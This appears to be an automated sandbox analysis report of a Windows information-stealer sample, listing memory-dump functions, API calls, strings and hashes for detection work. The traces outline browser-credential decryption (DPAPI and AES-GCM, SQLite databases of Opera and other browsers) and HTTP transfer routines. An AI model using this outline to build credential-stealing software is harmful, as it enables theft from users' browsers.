                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B8FC
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B934
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B969
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B99E
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B9CF
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040BA11
                                                          • wsprintfA.USER32 ref: 0040BA84
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0043464E: __EH_prolog.LIBCMT ref: 00434653
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040C10D
                                                          • LocalFree.KERNEL32(?,?,?), ref: 0040C16F
                                                          • LocalFree.KERNEL32(?), ref: 0040C230
                                                            • Part of subcall function 0040908B: __EH_prolog.LIBCMT ref: 00409090
                                                            • Part of subcall function 0040908B: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 004090F6
                                                            • Part of subcall function 0040908B: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 00409114
                                                            • Part of subcall function 0040908B: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 00409135
                                                            • Part of subcall function 0040908B: LocalAlloc.KERNEL32(00000040,?), ref: 0040918C
                                                            • Part of subcall function 0040908B: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004091B7
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040C1EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$Crypt$H_prologLocal$DataDeallocateFreeUnprotect$AlgorithmAllocDecryptGenerateOpenPropertyProviderSymmetricwsprintf
                                                          • String ID: "},$360Browser$Opera$UCBrowser$v10
                                                          • API String ID: 92069778-3198395839
                                                          • Opcode ID: de589bf7fd98632ef2bcb179b5fa5b93022538791162d07cdf74f473b1f7061f
                                                          • Instruction ID: e1dbde0e08428312f3ba378b1e1b579155c2731903d924ab7e8bf8f0fca406f0
                                                          • Opcode Fuzzy Hash: de589bf7fd98632ef2bcb179b5fa5b93022538791162d07cdf74f473b1f7061f
                                                          • Instruction Fuzzy Hash: 7372DF30D00298DBDF21DBA4DC90AEEBB75AF15304F1045BEE44977292DB385A89CF69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409D52, Relevance: 25.2, APIs: 11, Strings: 3, Instructions: 699libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00409D57
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409D9F
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409DD1
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409E10
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409E48
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409E7D
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409EAE
                                                          • GetProcAddress.KERNEL32(?,?), ref: 00409EF0
                                                          • wsprintfA.USER32 ref: 00409F64
                                                            • Part of subcall function 00408F32: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,0000000F,00000000,00408E93), ref: 00408F45
                                                            • Part of subcall function 00408F32: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 00408F5C
                                                            • Part of subcall function 00408F32: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F67
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 00409D11: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409D3F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$Transaction$CommitCreateDeallocateDeleteFileH_prologIos_base_dtorTransactedstd::ios_base::_wsprintf
                                                          • String ID: "},$Opera$v10
                                                          • API String ID: 465370126-2774946106
                                                          • Opcode ID: 0941b6d138231b631f751a7cdb452f01de6559c0a2ab80e844c62a6ce2583b6a
                                                          • Instruction ID: 3af672d16c1c6957a8f3fd5aaa739cbaa4c091a7312e55e91f1dce54e6460608
                                                          • Opcode Fuzzy Hash: 0941b6d138231b631f751a7cdb452f01de6559c0a2ab80e844c62a6ce2583b6a
                                                          • Instruction Fuzzy Hash: 5552AE30C00258DBDF21EBA5DC90AEDBB75BF15308F1044BEE44977292EB785A98CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409290, Relevance: 7.8, APIs: 5, Instructions: 271memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00409295
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0000002A,?,00000000), ref: 004093AD
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 004093B4
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0000002A,?,00000000), ref: 00409543
                                                          • HeapFree.KERNEL32(00000000,?,0000002A), ref: 0040954A
                                                            • Part of subcall function 00408D6C: __EH_prolog.LIBCMT ref: 00408D71
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Heap$FreeH_prologProcess$Deallocate
                                                          • String ID:
                                                          • API String ID: 4229974167-0
                                                          • Opcode ID: 648bf429ba290892e344c74419759c508e3f68d1945c01e2f165969f28a816e3
                                                          • Instruction ID: fd37fb6afb64d234eb3eb93e1deb8cc9c36cd3d26c4329de1a1fe0aadbf5ec54
                                                          • Opcode Fuzzy Hash: 648bf429ba290892e344c74419759c508e3f68d1945c01e2f165969f28a816e3
                                                          • Instruction Fuzzy Hash: 10B12831C01259EACF15EFE5C991AEDBBB4AF58308F14417EE44177282EB786E08CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043DCD2, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindClose.KERNEL32(000000FF,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DCDE
                                                          • FindFirstFileExW.KERNELBASE(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,0043DD01,?,?), ref: 0043DD0E
                                                          • GetLastError.KERNEL32(?,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DD1B
                                                          • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DD35
                                                          • GetLastError.KERNEL32(?,?,0043DD01,?,?,?,?,004088E6,?,?), ref: 0043DD42
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Find$ErrorFileFirstLast$Close
                                                          • String ID:
                                                          • API String ID: 569926201-0
                                                          • Opcode ID: 82f7df59231a94df77c35ceef2d6901dc7cad0b730a18766c357d05bc91e43df
                                                          • Instruction ID: 3eb9c40ecef6793db90dc01355cfc382fa45cc31e2a879bd7caf4100b12f994e
                                                          • Opcode Fuzzy Hash: 82f7df59231a94df77c35ceef2d6901dc7cad0b730a18766c357d05bc91e43df
                                                          • Instruction Fuzzy Hash: 17018831400185BBCB301FB6EC4DC6B3FB9FFDA721F20562AF969851A0DB718861D669
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00413396, Relevance: 2.0, APIs: 1, Instructions: 478COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041339B
                                                            • Part of subcall function 0041593A: _memcmp.LIBVCRUNTIME ref: 0041595E
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 004117B9: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,?,?,?,0000000F), ref: 004117CF
                                                            • Part of subcall function 004117B9: CopyFileTransactedA.KERNEL32 ref: 004117F5
                                                            • Part of subcall function 004117B9: CommitTransaction.KTMW32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,0000000F,?,?), ref: 00411800
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 0041181B: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 0041182F
                                                            • Part of subcall function 0041181B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00411848
                                                            • Part of subcall function 0041181B: CommitTransaction.KTMW32(00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 00411853
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Transaction$Create$CommitDeallocateH_prologTransacted$CopyDirectoryFile_memcmp_strcat
                                                          • String ID:
                                                          • API String ID: 3245935484-0
                                                          • Opcode ID: 5356c60edd2bba2cd1860a9850a69dc4013807a60ddb08dbc6db29372a8db3ad
                                                          • Instruction ID: f3f9c6cadcddf5fc8044afc7c10f73e65d387ef1a37edea53bf2efaf02f12855
                                                          • Opcode Fuzzy Hash: 5356c60edd2bba2cd1860a9850a69dc4013807a60ddb08dbc6db29372a8db3ad
                                                          • Instruction Fuzzy Hash: 3612C130D04298CBDF25EFA5C9916EDBBB1AF59304F1441AEE44537282DB381B8DCB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00412EFA, Relevance: 1.8, APIs: 1, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: c9de80337c244459ebcb2db71b3da70120da344028947ec067f419616bea17dc
                                                          • Instruction ID: 8e3b00a26865339a952ce74bd21bc0337f2cbf931d0ccf5e94749deb5f102623
                                                          • Opcode Fuzzy Hash: c9de80337c244459ebcb2db71b3da70120da344028947ec067f419616bea17dc
                                                          • Instruction Fuzzy Hash: 06D1E130D05298DBDF24EFA5C990AEDBBB1AF55304F1041AEE44577282DB381B8DCB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00434BE4, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameA.ADVAPI32(?,?), ref: 00434BFF
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 61f5ba5c05d30305611304f49ad6eb72e951543a1afcd66fa6b76d218acbb846
                                                          • Instruction ID: cdb59cd0f94429d4d66104043b97c2d866e40b7933060b8ae6305b36cffb063e
                                                          • Opcode Fuzzy Hash: 61f5ba5c05d30305611304f49ad6eb72e951543a1afcd66fa6b76d218acbb846
                                                          • Instruction Fuzzy Hash: 67D0C97480810DEBCF50DB90D989AC9B7BCAB00308F0004A294C1E3140EAF4ABC99B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043FFB9, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043FFBE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 0a892cb4e3d730a78287366a478fff2bfeddee0f7d52e7acac9b3283aeab1430
                                                          • Instruction ID: e71450121f06e058156b6e007decbdaaa2b844daf627821a67199a6c75cb157f
                                                          • Opcode Fuzzy Hash: 0a892cb4e3d730a78287366a478fff2bfeddee0f7d52e7acac9b3283aeab1430
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00433419, Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 286fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043341E
                                                          • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00489D28,0000000F,00489C68), ref: 00433456
                                                          • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0043347C
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 0043354B
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 004379C6
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004379FB
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00433595
                                                          • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 00433607
                                                          • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 0043366B
                                                          • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043369F
                                                          • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 004336AD
                                                          • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 004336C1
                                                          • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 004336F2
                                                          • WriteFile.KERNELBASE(?,00000000,?,50504C24,00000000), ref: 0043370A
                                                          • GetLastError.KERNEL32 ref: 00433724
                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 0043372B
                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 00433735
                                                          • CloseHandle.KERNEL32(00000000), ref: 0043373F
                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 00433746
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
                                                          • String ID: $LPPTW$%99[^:]://%99[^/]%99[^]$GET
                                                          • API String ID: 4006077129-1281010622
                                                          • Opcode ID: 2885bc612a91059529dcb206a4fb51482aa4d3441911177a6d3b3c7763f89535
                                                          • Instruction ID: b7fd45e6f86db62879f53687c2c84e51b1ba1d755b51915b7fefef195e298148
                                                          • Opcode Fuzzy Hash: 2885bc612a91059529dcb206a4fb51482aa4d3441911177a6d3b3c7763f89535
                                                          • Instruction Fuzzy Hash: 94A190B1901219AFDB15DFA4CC85AFEB7B8EF09300F00446EE445E7241EB789A49CB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00433035, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 311COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043303A
                                                          • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047913B,00000000), ref: 00433083
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,?,?,?,0047913B,00000000), ref: 00433150
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 004379C6
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004379FB
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,00000050,00000000,?,?,?,?,0047913B,00000000), ref: 004331A4
                                                          • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047913B,00000000), ref: 00433227
                                                          • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047913B,00000000), ref: 00433299
                                                          • _strlen.LIBCMT ref: 004332C7
                                                          • _strlen.LIBCMT ref: 004332D1
                                                          • WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047913B,00000000), ref: 004332E8
                                                          • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047913B,00000000), ref: 004332FA
                                                          • WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,?,?,0047913B,00000000), ref: 00433312
                                                          • WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,0047913B,00000000), ref: 00433347
                                                          • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047913B,00000000), ref: 004333F1
                                                          • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047913B,00000000), ref: 004333FB
                                                          • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047913B,00000000), ref: 00433402
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableH_prologQueryReadReceiveResponseSend
                                                          • String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8$W?##'$
                                                          • API String ID: 3111926358-2202757171
                                                          • Opcode ID: b0b3951e95bfae3309a261b77548669d7193459d9a2734a4dd0bbd486387487a
                                                          • Instruction ID: 05f8a82949e843c013f553bd956fb5828c0233835a0e1ee9e73ce7b1454cafef
                                                          • Opcode Fuzzy Hash: b0b3951e95bfae3309a261b77548669d7193459d9a2734a4dd0bbd486387487a
                                                          • Instruction Fuzzy Hash: 59C1A0719012189FDB14DFA5CD85AFEB7B4EF08304F1081AEE805A7241EB789B48CF69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00437B2C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 00437B3E
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00437B45
                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437B5F
                                                          • GetLastError.KERNEL32 ref: 00437B69
                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437B79
                                                          • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437B8D
                                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437BA1
                                                          • GlobalFree.KERNEL32(00000000), ref: 00437BC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                          • String ID: S-1-5-18
                                                          • API String ID: 857934279-4289277601
                                                          • Opcode ID: f7ae03d04bcf4bcea9be981246b4f95a5eb60c21456bc1f444ef70093901814f
                                                          • Instruction ID: 1f7fc770c449e5ef917d1db7b83adc8cf6f4133edf0ba8dd74851c59fbbd0061
                                                          • Opcode Fuzzy Hash: f7ae03d04bcf4bcea9be981246b4f95a5eb60c21456bc1f444ef70093901814f
                                                          • Instruction Fuzzy Hash: 73112B75A04109FBDB209BE1DD88FAFBF7CEB08759F104066E981E1050EB749A04DB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0027024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                          • Instruction ID: 258b0072dbcd63c63db6404e04d5d94fa5574a1985dcd99a378f5bd1bc336d7a
                                                          • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                          • Instruction Fuzzy Hash: D4526974A11229DFDB64CF58C985BA8BBB1BF09304F1480D9E90DAB351DB30AE99DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040CB61, Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 479librarystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040CB66
                                                            • Part of subcall function 00434A6B: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434AB7
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0040CBA3
                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040CBDB
                                                          • lstrcatW.KERNEL32 ref: 0040CC1E
                                                            • Part of subcall function 00409290: __EH_prolog.LIBCMT ref: 00409295
                                                            • Part of subcall function 00409290: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0000002A,?,00000000), ref: 004093AD
                                                            • Part of subcall function 00409290: HeapFree.KERNEL32(00000000,?,?), ref: 004093B4
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040D1D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcatlstrcat
                                                          • String ID: Opera$sqlite3.dll
                                                          • API String ID: 1063041688-285176451
                                                          • Opcode ID: 468d6118cfe1c5adc2c65b3a669831a40c6bb291e0ea35cb33d9e6a1d28c9aa1
                                                          • Instruction ID: 30359fc26c21a63d47321453241d1184baea90a40374f1c94b62b65a5bac539a
                                                          • Opcode Fuzzy Hash: 468d6118cfe1c5adc2c65b3a669831a40c6bb291e0ea35cb33d9e6a1d28c9aa1
                                                          • Instruction Fuzzy Hash: 83129D31D01219AFDF14EFA5C845BEEBBB4BF01319F14446EE4057B282DB785A09CB9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004581D4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          • Opcode ID: e7d37b9331b9543c1e382c5bc9fd50b3d347fcbd3c11ad225270803f898bb3dd
                                                          • Instruction ID: 2928c844e1cff2f9904dc91d99224c33d08a4fe34f013d89569e317c5bfe8845
                                                          • Opcode Fuzzy Hash: e7d37b9331b9543c1e382c5bc9fd50b3d347fcbd3c11ad225270803f898bb3dd
                                                          • Instruction Fuzzy Hash: 79210B31A01B14ABCB218A649C40A6B3F549F01761F2501ABFD45B7392DE78DC05C5E9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00437819, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043781E
                                                          • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,00000000,00000000), ref: 0043789F
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 004378EE
                                                          • RegCloseKey.ADVAPI32(?), ref: 0043790F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseH_prologOpenQueryValue
                                                          • String ID: @
                                                          • API String ID: 1233982722-2766056989
                                                          • Opcode ID: c48e9f8012cdd66c44fa1c94e32cbd1a308e57fa846d19f25d837095ffa97827
                                                          • Instruction ID: 157efcb79fb4b84a20a9dc010fa58e09f60189f15844cbfa7cec64a3e8538c19
                                                          • Opcode Fuzzy Hash: c48e9f8012cdd66c44fa1c94e32cbd1a308e57fa846d19f25d837095ffa97827
                                                          • Instruction Fuzzy Hash: 31416CB1D042989FDB21DFA8C980AEEBBB8AF09304F10517EE485B7252D7344A49CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00444022, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-
                                                          • API String ID: 0-2084034818
                                                          • Opcode ID: aa141df59e281e09356cae7e398c67eb6676a4416c05ad27f71246e0624b72e3
                                                          • Instruction ID: b42a34a6115caf3d9264701d5b124a884d534100942c6fe174e8aad5eb56ed89
                                                          • Opcode Fuzzy Hash: aa141df59e281e09356cae7e398c67eb6676a4416c05ad27f71246e0624b72e3
                                                          • Instruction Fuzzy Hash: 3711CF31A01221EBEB218BA49C80B6F37949F85771B210227EE45A7391DB74DD11CADD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F350A, Relevance: 7.8, APIs: 5, Instructions: 319COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2433229096.00000000047F3000.00000080.00020000.sdmp, Offset: 047F3000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3727bd8be8a917829d0fe70221a87ab8238f6ab16b75cdd68d71ff44ca5b91e8
                                                          • Instruction ID: cd0d5f3022960887c61718bf3929cc63a6aaf8493b6dbd5e367d0d6b7f8bdeea
                                                          • Opcode Fuzzy Hash: 3727bd8be8a917829d0fe70221a87ab8238f6ab16b75cdd68d71ff44ca5b91e8
                                                          • Instruction Fuzzy Hash: 71A15AB25056529FD7218EB89CC46D47FA4EF432307180769DEE29B3D3E764744A8760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045C418, Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __alloca_probe_16.LIBCMT ref: 0045C49C
                                                          • __alloca_probe_16.LIBCMT ref: 0045C562
                                                          • __freea.LIBCMT ref: 0045C5CE
                                                            • Part of subcall function 00458BEE: RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          • __freea.LIBCMT ref: 0045C5D7
                                                          • __freea.LIBCMT ref: 0045C5FA
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1423051803-0
                                                          • Opcode ID: 4408edbfcf743a9a0465ff6bcdae0845a77f36611c83ce6a97e7d7c751c73c77
                                                          • Instruction ID: d4141f52ff7fa81a004ed66218cf16a64cd233b83f7c736c102e8df16e606a84
                                                          • Opcode Fuzzy Hash: 4408edbfcf743a9a0465ff6bcdae0845a77f36611c83ce6a97e7d7c751c73c77
